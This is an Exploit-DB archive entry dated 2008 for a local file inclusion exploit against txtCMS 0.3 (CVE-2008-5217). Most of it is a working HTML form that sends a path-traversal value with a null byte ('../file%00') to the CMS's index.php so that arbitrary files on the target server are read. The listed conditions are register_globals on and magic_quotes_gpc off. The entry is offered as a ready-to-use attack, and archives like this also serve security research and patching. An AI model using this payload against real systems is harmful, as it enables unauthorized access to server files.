txtCMS 0.3 index.php Local File Inclusion Exploit

2008-05-09T00:00:00
ID EDB-ID:5579
Type exploitdb
Reporter cOndemned
Modified 2008-05-09T00:00:00

Description

txtCMS 0.3 (index.php) Local File Inclusion Exploit. CVE-2008-5217. Webapps exploit for php platform

                                        
                                            <!--
Name : txtCMS 0.3 (index.php) Local File Inclusion Exploit
Author : cOndemned
Conditions : Register_globals = On / Magic_quotes_gpc = Off
Greetz : irk4z, GregStar, ZaBeaTy, ElusiveN, Avanturka :***
-->

<html>
<head>
<title>txtCMS 0.3 (index.php) Local File Inclusion Exploit</title>
</head>
<body>
<form action="http://target.host/txtcmsv0.3/index.php" method="POST">
<input type="text" name="id" value="../file%00">
<input type="submit" value="show">
</form>
</body>
</html>

# milw0rm.com [2008-05-09]